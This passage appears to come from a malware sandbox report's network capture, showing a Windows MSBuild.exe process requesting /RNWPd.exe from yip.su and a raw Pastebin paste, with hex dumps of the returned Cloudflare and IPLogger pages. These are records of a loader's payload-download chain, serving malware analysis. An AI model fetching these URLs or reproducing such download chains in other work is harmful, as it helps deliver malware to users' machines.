                    2024-09-16 19:21:49 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:21:49 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:21:49 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.649752188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:51 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:21:51 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:21:51 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:21:51 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ca43NPgQQIGgVYHT5H6gHpOfeQtkVdCX1c%2FGvINqyI1qOQmdcSlepImvMlXOJ26VSkRWRal1FbD6tiLN%2BPcVEIidw6DJY1gnfdmKC00fF%2B7iL2Iok6fJT28%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4338d1ab284241-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:21:51 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:21:51 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:21:51 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:21:51 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:21:51 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:21:51 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:21:51 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:21:51 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.649754104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:55 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:21:56 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4338eccc5e43ca-EWR
                    2024-09-16 19:21:56 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:21:56 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:21:56 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:21:56 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:21:56 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.649755188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:57 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:21:57 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:21:57 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:21:57 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQvOAACLHYquX1qGGld17OeC4Z4Y6cCzAdGEvAY9difRVcTHoynHDOM%2F72nanHJtJQ9RvTIqoj1gk6kwy%2FH3ht6he3wTf1Vm3zbLotnqaFQNWLD6B9UJt1g%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4338f45c7d0f4a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:21:57 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:21:57 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                    2024-09-16 19:21:57 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:21:57 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:21:57 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
